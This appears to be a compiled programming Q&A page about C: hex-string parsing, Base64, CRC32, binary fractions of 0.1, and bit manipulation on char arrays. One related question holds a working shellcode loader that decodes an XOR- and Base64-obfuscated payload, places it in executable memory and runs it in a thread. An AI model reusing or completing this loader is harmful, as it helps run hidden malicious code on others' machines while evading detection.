Is there a good way to parse 32-bit values out of a string? The following function does not return the correct value and I don't know how to fix it. The value should be 170.
unsigned int getvalue(const char *data, int offset)
{
    unsigned int payload = 0;
    for (unsigned char i = 0; i < 4; i++)
    {
        payload <<= 8;
        payload |= data[i + offset];
    }
    return payload;
}
int value = 0x00aa;
unsigned char b1 = (value & 0xFF);
unsigned char b2 = ((value >> 8) & 0xFF);
unsigned char b3 = ((value >> 16) & 0xFF);
unsigned char b4 = ((value >> 24) & 0xFF);
int number = (b4 << 24) + (b3 << 16) + (b2 << 8) + b1;
printf("value is: %d\n", number); // value is: 170 correct
char payload[] = "000000aa";
int value2 = getvalue(payload, 0);
printf("value is: %dn", value2); // value is: 808464432n Not correct
If you want to convert a C string containing a hexadecimal number to its integer value:
#include <ctype.h>
#include <string.h>

unsigned long long conv(const char *str)
{
    const char digits[] = "0123456789ABCDEF";
    unsigned long long result = 0;
    char *ref;

    while (*str)
    {
        result *= 16;
        ref = strchr(digits, toupper((unsigned char)*str));
        if (ref)
        {
            result += ref - digits;
        }
        else
        {
            /* error handling */
        }
        str++;
    }
    return result;
}
The digits in the C string are the ASCII representations of the corresponding characters: '0' is not stored in the char array as the value zero but as 0x30.
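For example, a quick check (assuming the conv function above, compiled together with <stdio.h>):

printf("%llu\n", conv("000000aa")); /* prints 170, the value the question expects */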
Change your getvalue to
unsigned int getvalue(const char *data, int offset)
{
    unsigned int payload = 0;
    for (unsigned char i = 0; i < 8; i++)
    {
        payload <<= 4;
        if (data[i + offset] >= 'a') {
            payload |= (data[i + offset] - 97) + 10;
        } else if (data[i + offset] >= 'A') {
            payload |= (data[i + offset] - 65) + 10;
        } else {
            payload |= (data[i + offset] - 48);
        }
    }
    return payload;
}
Each hex digit occupies 4 bits, hence << 4.
Each char in the string is its ASCII code, hence the subtraction.
The ASCII value of 'a' is 97, but its digit value must be 10, so the expression is 'a' - 97 + 10.
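With that change, the question's example works (a quick check, assuming the modified getvalue above):

char payload[] = "000000aa";
printf("value is: %u\n", getvalue(payload, 0)); /* value is: 170 */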
There is no need to reinvent the wheel. There is a library function to do this: strtol.
#include <stdlib.h>
#include <limits.h>

unsigned int getvalue(const char *data, int offset)
{
    char *end;
    long payload = strtol(&data[offset], &end, 16);
    if (*end || payload < 0 || payload > UINT_MAX) {
        /* error handling */
    }
    return (unsigned int)payload;
}
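A quick check of both paths (a sketch, assuming the version above and NUL-terminated input):

printf("%u\n", getvalue("000000aa", 0)); /* prints 170; strtol consumes the whole string */
getvalue("0000zzzz", 0);                 /* strtol stops at 'z', so *end != '\0' and the error branch runs */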
Related
I am trying to create a shellcode by combining XOR encryption and Base64 encoding. However, I have a problem: the Base64 decoder that I found outputs a char array, but I need an unsigned char array because all the rest of the algorithm works on unsigned char arrays. I added my code below. Can you suggest a solution?
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "windows.h"
/* ---- Base64 Encoding/Decoding Table --- */
char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
void b64_encode(char *clrstr, char *b64dst);
void decodeblock(unsigned char in[], char *clrstr);
void b64_decode(char *b64src, char *clrdst);
void encodeblock( unsigned char in[], char b64str[], int len );
int main() {
PVOID lclbuff;
HANDLE thrd;
int i;
// mysrc was first XOR-encrypted with key1, then XOR-encrypted again with key2, and finally Base64-encoded. Therefore, I need to reverse these steps.
char mysrc[] = "XHhmOFx4NTZceDgzXHhmMFx4ZTFceGU1XHhkZlx4MGNceDEwXHgxOFx4NGRceDQyXHg0OVx4NDlceDRiXHg1MVx4NDFceDQ5XHgyOVx4YzdceDYxXHg1Nlx4OGJceDQ2XHg3MVx4NDVceDk0XHg1ZVx4MDhceDUwXHg4N1x4NDFceDI4XHg1MVx4OTJceDcyXHg0N1x4NDlceDE3XHhhMlx4NGVceDU0XHg0ZFx4MjVceGQ4XHg0NVx4MmVceGNjXHhiY1x4MjRceDZkXHg2Zlx4MGFceDM1XHgzOVx4NDFceGQ2XHhjOFx4MTVceDU0XHgwNVx4ZGZceGUyXHhmOVx4NDNceDRjXHg0ZVx4NDRceDliXHg0YVx4MmNceDk4XHg0YVx4MjVceDUxXHgwMVx4YzdceDhhXHg5OFx4OWRceDA0XHgxZVx4MDBceDVjXHg5NFx4Y2RceDZiXHg2Ylx4NThceDE5XHhkY1x4NDNceDgzXHg1MVx4MDFceDQ0XHg5Y1x4NDFceDM4XHg1Y1x4MDVceGNlXHhlM1x4NDJceDU5XHhmMlx4ZDZceDRkXHg5Ylx4MmNceDg0XHg1Ylx4MDlceGNmXHg1NFx4MzFceGRlXHg0OVx4MjlceGQ1XHhhOFx4NWZceGMxXHhkZFx4MWNceDRjXHgxZVx4Y2RceDI4XHhmOFx4NzlceGUyXHg0NFx4MWFceDU1XHgyNFx4MWZceDQ0XHgyMVx4YzRceDcxXHhjNlx4NThceDUwXHg5YVx4NGRceDNiXHg0NVx4MTFceGM4XHg2YVx4NTJceDgzXHgxNVx4NTFceDQ0XHg5Y1x4NDFceDA0XHg1Y1x4MDVceGNlXHg0MVx4OWZceDE1XHg4NVx4NTdceDBkXHhjMFx4NTlceDU0XHg1Mlx4NTBceDQ3XHg0MFx4NWFceDU2XHg1OVx4NTlceDRjXHg0NVx4NDRceDQ4XHg5N1x4ZmRceDJkXHg1ZVx4NWVceGVmXHhmOFx4NTRceDUyXHg1MVx4NDNceDUxXHg4Ylx4MDVceGU4XHg0Zlx4ZWFceGZiXHhlMVx4NWRceDVkXHhhZlx4N2FceDZjXHgzZVx4NGZceDJiXHgzZVx4MTNceDA4XHg1OFx4NGZceDQ5XHg5ZVx4ZTdceDUwXHg5NFx4ZThceGJlXHgwMVx4MTRceDExXHg0NFx4OTZceGU5XHg1OVx4YTRceDBlXHgxM1x4MmRceDYyXHgxM1x4MDBceDE1XHgwNVx4NTlceDQxXHg0ZFx4OTdceGU0XHg1OFx4OThceGZjXHg1ZVx4YjZceDVjXHg2Zlx4MmFceDE0XHhmN1x4Y2NceDU1XHg4OVx4ZmRceDY5XHgxOVx4MTRceDA0XHgxZVx4NTlceDU1XHhhYlx4MjRceDlmXHg2N1x4MTBceGU3XHhkOVx4NDNceDU4XHg1NFx4MjhceGM5XHg1YVx4MzBceGQ4XHg1ZFx4ZmJceGRlXHg0OFx4OWRceGQzXHg0NVx4ZTBceGNjXHg1OFx4OTFceGNkXHg1Mlx4YjJceGYzXHgxNlx4ZGZceGY3XHhmZVx4Y2RceDVkXHg4ZFx4ZDlceDZhXHgwNFx4NTBceDU1XHg1M1x4ODVceGYyXHg1MFx4ODVceGVhXHg0OVx4YTNceDgwXHhhNVx4NjNceDYwXHhlN1x4YzBceDRjXHg5Zlx4YzRceDU0XHgxM1x4MGRceDFmXHg0NVx4YThceDdiXHg2MVx4NzdceDA4XHgxOVx4MTlceDAwXHgxN1x4NDBceDQ4XHg1NFx4NTRceDU2XHg4OVx4ZjZceDQ2XHg1YVx4NDhceDQxXHgyMVx4ZDhceDY2XHgxZVx4NTFceDU4XHg0OVx4ZTJceGViXHg2N1x4ZGZceDUxXHgyMFx4NGFceDAxXHgxNVx4NTlceDgwXHg1Ylx4MjhceDA4XHhkZVx4MGNceDdiXHg0MFx4OTBceGZmXHg1Nlx4NDdceDQwXHg0OFx4NTRceDU0XHg1Zlx4NTBceDVkXHhlZVx4Y2RceDVlXHg1Y1x4NTlceGU3XHhjNFx4NWVceDgxXHhkOFx4NTVceDg5XHhkNlx4NDBceGEyXHg2Y1x4YzhceDIxXHg4Nlx4ZWJceGM0XHg0NVx4MmVceGRlXHg1OFx4ZTdceGM2XHg5OFx4MDZceDU4XHhhM1x4MDhceDkwXHgxY1x4NzhceGVhXHhkMVx4YTVceGYwXHhhMVx4YjNceDViXHg1ZVx4YjZceGI2XHg4ZFx4YjFceDhlXHhmN1x4Y2NceDUxXHg4M1x4ZDNceDI5XHgyNFx4MTNceDc4XHgxNFx4ODBceGVmXHhmMVx4NzhceDFhXHhiN1x4NTdceDBiXHg3ZVx4N2NceDYyXHgxOVx4NDBceDQxXHg5ZVx4ZGJceGU3XHhjMA==";
char myb64[1840];
unsigned char nw[1840];
b64_decode(mysrc, myb64);
printf("%s\n", myb64); // This gives following and true output: \xf8\x56\x83\xf0\xe1\xe5\xdf\x0c\x10\x18...
//However, It must reside inside an unsigned char array, as occurs in the output above.
//The output above must be turned into unsigned char array which is 'nw'. What can I do?
char key1[] = "elma";
char key2[] = "armut";
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key2[i % strlen(key2)];
}
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key1[i % strlen(key1)];
}
lclbuff = VirtualAlloc(NULL, sizeof(nw), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
CopyMemory(lclbuff, nw, sizeof(nw));
thrd = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lclbuff, NULL, 0, NULL);
WaitForSingleObject(thrd, INFINITE);
return 0;
}
// The functions below are only needed for Base64 encoding/decoding, so you can skip over them.
/* encode - base64 encode a stream, adding padding if needed */
void b64_encode(char *clrstr, char *b64dst) {
unsigned char in[3];
int i, len = 0;
int j = 0;
b64dst[0] = '\0';
while(clrstr[j]) {
len = 0;
for(i=0; i<3; i++) {
in[i] = (unsigned char) clrstr[j];
if(clrstr[j]) {
len++; j++;
}
else in[i] = 0;
}
if( len ) {
encodeblock( in, b64dst, len );
}
}
}
/* decodeblock - decode 4 '6-bit' characters into 3 8-bit binary bytes */
void decodeblock(unsigned char in[], char *clrstr) {
unsigned char out[4];
out[0] = in[0] << 2 | in[1] >> 4;
out[1] = in[1] << 4 | in[2] >> 2;
out[2] = in[2] << 6 | in[3] >> 0;
out[3] = '\0';
strncat(clrstr, out, sizeof(out));
}
void b64_decode(char *b64src, char *clrdst) {
int c, phase, i;
unsigned char in[4];
char *p;
clrdst[0] = '\0';
phase = 0; i=0;
while(b64src[i]) {
c = (int) b64src[i];
if(c == '=') {
decodeblock(in, clrdst);
break;
}
p = strchr(b64, c);
if(p) {
in[phase] = p - b64;
phase = (phase + 1) % 4;
if(phase == 0) {
decodeblock(in, clrdst);
in[0]=in[1]=in[2]=in[3]=0;
}
}
i++;
}
}
/* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */
void encodeblock( unsigned char in[], char b64str[], int len ) {
unsigned char out[5];
out[0] = b64[ in[0] >> 2 ];
out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ];
out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) |
((in[2] & 0xc0) >> 6) ] : '=');
out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '=');
out[4] = '\0';
strncat(b64str, out, sizeof(out));
}
I am writing a Base64 encoder and decoder and have it almost completely functional. I just need to be able to pad the encoded data with equals signs if the number of input bytes does not round out to a multiple of 3. I am relatively new to C and am not sure how I would detect the number of bytes or pad the output accordingly. This is what I have so far:
void encode(char* src, char* dest) {
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
unsigned char first = (src[0] >> 2);
unsigned char second = (src[0] << 4) | (src[1] >> 4);
second = (second << 2);
second = (second >> 2);
unsigned char third = (src[1] << 2) | (src[2] >> 6);
third = (third << 2);
third = (third >> 2);
unsigned char fourth = (src[2]);
fourth = (fourth << 2);
fourth = (fourth >> 2);
dest[0] = base64[first];
dest[1] = base64[second];
dest[2] = base64[third];
dest[3] = base64[fourth];
}
And my decoder method...
void decode(char* src, char* dest) {
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int i;
int j;
int index;
for(i = 0; i < 4; i++) {
index = 0;
for(j = 0; j < 64; j++) {
if (src[i] == base64[j]) {
src[i] = index;
} else {
index++;
}
}
}
char first = (src[0] << 2) | (src[1] >> 4);
char second = (src[1] << 4) | (src[2] >> 2);
char third = (src[2] << 6) | (src[3]);
dest[0] = first;
dest[1] = second;
dest[2] = third;
}
If this is not enough and I need to also provide the rest of my code I can do so.
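For reference, one way to handle a short final group (a sketch, not the poster's code; encode_group and b64tbl are illustrative names): the caller passes how many real input bytes are in the group, and the missing positions are padded with '='.

static const char b64tbl[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Encode one group of n (1..3) input bytes into exactly 4 output characters (no NUL). */
void encode_group(const unsigned char *src, int n, char *dest)
{
    unsigned char b0 = src[0];
    unsigned char b1 = (n > 1) ? src[1] : 0;
    unsigned char b2 = (n > 2) ? src[2] : 0;

    dest[0] = b64tbl[b0 >> 2];
    dest[1] = b64tbl[((b0 & 0x03) << 4) | (b1 >> 4)];
    dest[2] = (n > 1) ? b64tbl[((b1 & 0x0f) << 2) | (b2 >> 6)] : '=';
    dest[3] = (n > 2) ? b64tbl[b2 & 0x3f] : '=';
}

The number of input bytes can come from strlen(src) for text, or be passed explicitly for binary data; encoding len bytes then means len / 3 full groups plus one padded group whenever len % 3 is 1 or 2.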
I found this CRC32 implementation on the internet and changed it a little bit, but I can't get it to work. I initialize it and update it for every byte I get from the input, but the hash I get is not what it should be...
typedef struct {
unsigned short xor;
} xor_context;
void crc32_init(crc32_context *context) {
context->crc = 0xFFFFFFFF;
}
void crc32_update(crc32_context *context, unsigned char byte) {
uint32_t crc, mask;
crc = context->crc;
crc = crc ^ byte;
for (int j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
context->crc = ~crc;
}
This one is the original:
unsigned int crc32b(unsigned char *message) {
int i, j;
unsigned int byte, crc, mask;
i = 0;
crc = 0xFFFFFFFF;
while (message[i] != 0) {
byte = message[i]; // Get next byte.
crc = crc ^ byte;
for (j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
i = i + 1;
}
return ~crc;
}
//typedef struct {
// unsigned short xor;
//} xor_context;//--> Not sure what part this plays in the code!
void crc32_init(crc32_context *context) {
context->crc = 0xFFFFFFFF;
}
void crc32_update(crc32_context *context, unsigned char byte) {
uint32_t crc, mask;
crc = context->crc;
crc = crc ^ byte;
for (int j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
//context->crc = ~crc; //<-- Don't perform for every byte.
context->crc = crc; //EDIT: Forgot this!
}
//Completes the check.
uint32_t crc32_complete(crc32_context *context){
return ~context->crc;
}
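A minimal usage sketch (assuming crc32_context is defined as a struct holding a uint32_t crc member, which is what the functions above require; the CRC-32 of "123456789" is the well-known check value 0xCBF43926):

#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint32_t crc; } crc32_context; /* assumed definition */

/* crc32_init, crc32_update and crc32_complete as above ... */

int main(void)
{
    const char *msg = "123456789";
    crc32_context ctx;

    crc32_init(&ctx);
    for (size_t i = 0; i < strlen(msg); i++)
        crc32_update(&ctx, (unsigned char)msg[i]);

    printf("%08" PRIX32 "\n", crc32_complete(&ctx)); /* prints CBF43926 */
    return 0;
}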
I was refreshing my memory on binary and floats and I ran into the following example:
0.1 is represented as: 0.0001100110011001100110011[0011] with the part in the brackets repeating.
If we round up this representation we get:
x = 0.00011001100110011001101 (0.10000002384185791015625 in decimal).
The difference x-0.1 has the binary representation:
0.0000000000000000000000000[1100] which is (0.00000002384185791015625 in decimal).
Now how can this value be expressed as a fraction of the form 2^x * 1/10?
I have read that it is basically 2^-22*(1/10) but I can't see how we can derive this. Any help?
Note: The numbers are rounded to 23 bits (but the 1 in the x-0.1 example is in the 25th)
Update:
My question is not how 1/10 is represented, but how, from the bit string 0.0000000000000000000000000[1100], we can express it in a "human" format, i.e. in decimal. In this case, 2^-22*(1/10).
Use the property that an n-bit binary pattern, repeated forever, has the value it would have if it occurred just once, multiplied by
pattern *= (1 << BitWidth) / ((1 << BitWidth) - 1);
Then proceed to simplify the fraction.
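For the bit string in the question this works out as follows (a worked check, not part of the original answer; note that the program below prints the exponent as a positive count of places, so its "2^29" means 2^-29):

x - 0.1 = 12 * 2^-29 * 16/15     (the 4-bit pattern 1100 = 12 ends 29 places after the point)
        = 192/15 * 2^-29
        = 64/5 * 2^-29
        = 128/10 * 2^-29
        = 2^7 * 2^-29 * (1/10)
        = 2^-22 * (1/10)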
#include <stdio.h>

unsigned gcd(unsigned a, unsigned b) {
if (b == 0)
return a;
else
return gcd(b, a % b);
}
// Print result & return NULL on success, else point to problem in input.
const char *Cratylus_s(const char *src) {
// parse the input
const char *s = src;
while (*s == '0')
s++;
if (*s != '.') {
return s;
}
s++;
const char *rp = s; // radix point
while (*s == '0')
s++;
int offset = s - rp;
if (*s != '[') {
return s;
}
s++;
unsigned bin = 0;
unsigned pow2 = 0;
while (*s == '0' || *s == '1') {
bin = bin * 2 + *s - '0';
pow2++;
s++;
}
if (*s != ']' || *++s != '\0') {
return s;
}
// multiply `bin` by (1 << pow2) / ((1 << pow2) - 1)
unsigned num = bin * (1 << pow2);
unsigned den = (1 << pow2) - 1;
const char *format = "2^%d*(%u/%u)\n";
printf(format, offset + pow2, num, den); // 2^29*(192/15)
// simplify
unsigned common = gcd(num, den);
num /= common;
den /= common;
printf(format, offset + pow2, num, den); // 2^29*(64/5)
// find powers of 10
for (unsigned d = den; d && d % 5 == 0; d /= 5) {
num *= 2;
den *= 2;
}
// find powers of 2
for (unsigned n = num; n && n % 2 == 0; n /= 2) {
num /= 2;
offset--;
}
printf(format, offset + pow2, num, den); // 2^-22*(1/10)
return NULL;
}
void Cratylus_test(const char *s) {
printf("'%s'\n", s);
const char *t = Cratylus_s(s);
printf("'%s'\n", t ? t : "OK");
}
int main(void) {
Cratylus_test("0.0000000000000000000000000[1100]");
Cratylus_test("0.000000000000000[0110]");
return 0;
}
'0.0000000000000000000000000[1100]'
2^29*(192/15)
2^29*(64/5)
2^22*(1/10)
'OK'
'0.000000000000000[0110]'
2^19*(96/15)
2^19*(32/5)
2^13*(1/10)
'OK'
Usually bit operations are done on smaller data widths such as int, unsigned int or wchar_t. Assuming we want to use bit strings in a longer format, how do we shift, get and set bits in a char string?
One way may be to divide and conquer using the conventional method, but how do we ensure the bits carry over?
Given
#define numberOfState 2000 // number of bits
#define numberOfBitsIn1Byte 8
char* record;
int numberOfCharRequiredToRepresentBits =
ceil(((float)numberOfState/(float)numberOfBitsIn1Byte));
record = (char*) malloc(sizeof(char)*numberOfCharRequiredToRepresentBits);
// record = "NAXHDKAN552ajdasdadNDfadsEBEAfA8gda5214S";
// optional : initialization by doing the set bit according to
// input from files. After which, do free(record);
How may we conduct bit operations such as to
i. shift the *record
ii. get bits from a specific bit position in *record
iii. set bits from a specific bit position in *record
Please have a try with the following code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int isLittleEndian = 1;
void checkEndian(void)
{
union
{
short inum;
char c[sizeof(short)];
} un;
un.inum=0x0102;
if(un.c[0]==1 && un.c[1]==2)
{
printf("big_endian.\n");
isLittleEndian = 0;
}
else if(un.c[0]==2 && un.c[1]==1)
{
printf("little_endian.\n");
isLittleEndian = 1;
}
}
void shift_L(char *src, char * dst, int len, int n)
{
int shiftBytes = n/8;
int shiftBits = n%8;
memset(dst, 0, len);
memcpy(dst, src + shiftBytes, len - shiftBytes);
if (shiftBits)
{
int i = 0;
unsigned short tmp = 0;
for ( i = 0; i < len; i++)
{
if (isLittleEndian)
{
tmp = *(dst+i) << 8 | *(dst+i+1);
tmp <<= shiftBits;
*(dst+i) = *((char *)&tmp + 1);
}
else
{
tmp = *(short *)(dst+i);
tmp <<= shiftBits;
*(dst+i) = *((char *)&tmp);
}
}
}
}
void shift_R(char *src, char * dst, int len, int n)
{
int shiftBytes = n/8;
int shiftBits = n%8;
memset(dst, 0, len);
memcpy(dst + shiftBytes, src, len - shiftBytes);
if (shiftBits)
{
int i = 0;
unsigned short tmp = 0;
for ( i = len -1; i >= 0; i--)
{
if (isLittleEndian)
{
tmp = *(dst+i-1) << 8 | *(dst+i);
tmp >>= shiftBits;
*(dst+i) = *((char *)&tmp);
}
else
{
tmp = *(short *)(dst+i-1);
tmp >>= shiftBits;
*(dst+i) = *((char *)&tmp+1);
}
}
}
}
int getBit(char *src, int n)
{
unsigned char tmp = *(src + n/8);
unsigned char mask = (0x1 << (8 - n%8 - 1));
int bit = 0;
bit = (tmp & mask) > 0;
printf("%d", bit);
return bit;
}
void setBit(char *src, int n, int bit)
{
unsigned char * pTmp = src + n/8;
unsigned char mask = (0x1 << (8 - n%8 - 1));
if (bit)
{
*pTmp |= mask;
}
else
{
*pTmp &= ~mask;
}
}
void dumpBin(unsigned char *src, int len)
{
int i = 0;
int j = 0;
unsigned char mask = 0;
for ( i = 0; i < len; i++)
{
for ( j = 0; j < 8; j++)
{
mask = 0x1 << 8 - j - 1;
printf("%d",(*(src + i) & mask) > 0);
}
}
}
int main(void)
{
char *record = "NAXHDKAN552ajdasdadNDfadsEBEAfA8gda5214S";
//char *record = "NAXHDKA";
int recordLen = strlen(record);
char * buffer = NULL;
int i = 0;
checkEndian();
recordLen = recordLen + recordLen%2;
buffer = malloc(recordLen);
memcpy(buffer, record, recordLen);
printf("\n input bit stream:\n");
dumpBin(buffer, recordLen);
printf("\n bit stream from getBit:\n");
for ( i = 0; i < recordLen*8; i++)
{
getBit(buffer, i);
}
setBit(buffer, 8, 1);
setBit(buffer, 9, 0);
setBit(buffer, 10, 1);
setBit(buffer, 11, 1);
printf("\n bit stream after setBit:\n");
dumpBin(buffer, recordLen);
shift_L(record, buffer, recordLen, 1);
printf("\n bit stream after shift_L:\n");
dumpBin(buffer, recordLen);
shift_R(record, buffer, recordLen, 9);
printf("\n bit stream after shift_R:\n");
dumpBin(buffer, recordLen);
printf("\n");
free(buffer);
return 0;
}
Your bitstream is essentially an array of char. So, to perform these operations you work on these char elements.
i. The shifting operation depends on the number of bits you want to shift.
If the number is a multiple of 8, it is pretty straightforward: you just copy the elements left or right by that many bytes (the shift amount divided by 8).
If the number is less than 8, you perform the operation on every element of the array, but you need to OR in the overflowing bits of the adjacent element. For example, in a left shift, element i must incorporate the overflowing bits of element i+1, and in a right shift, the overflowing bits of element i-1.
Any other number of bits you want to shift can be achieved by a combination of these two actions. For example, a left shift by 18 is a shift by 16 followed by a shift by 2.
In any case, you need to be careful on which side of the bitstring you start, so that you do not lose data.
ii. In order to get the n-th bit of the bitstream, you access the element with index n/8 (integer division) and get the n%8 bit from it.
iii. Pretty much the same as ii, except that you set or clear the bit with a mask instead of reading it (see the sketch below).
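A minimal sketch of ii and iii, plus the small-shift case from i (not the original poster's code; the helper names are illustrative, and bit 0 is taken to be the most significant bit of record[0], as in the code above):

#include <stddef.h>

/* ii. Get the n-th bit (0 = most significant bit of record[0]). */
int get_bit(const unsigned char *record, size_t n)
{
    return (record[n / 8] >> (7 - n % 8)) & 1;
}

/* iii. Set (bit != 0) or clear (bit == 0) the n-th bit. */
void set_bit(unsigned char *record, size_t n, int bit)
{
    unsigned char mask = (unsigned char)(1u << (7 - n % 8));
    if (bit)
        record[n / 8] |= mask;
    else
        record[n / 8] &= (unsigned char)~mask;
}

/* i. Left-shift a len-byte buffer by k bits (0 < k < 8), ORing in
   the bits that overflow from the next element. */
void shift_left_small(unsigned char *record, size_t len, unsigned k)
{
    for (size_t i = 0; i < len; i++) {
        unsigned char next = (i + 1 < len) ? record[i + 1] : 0;
        record[i] = (unsigned char)((record[i] << k) | (next >> (8 - k)));
    }
}

Shifts by 8 or more bits can then be done by moving whole bytes (memmove) followed by one of these small shifts.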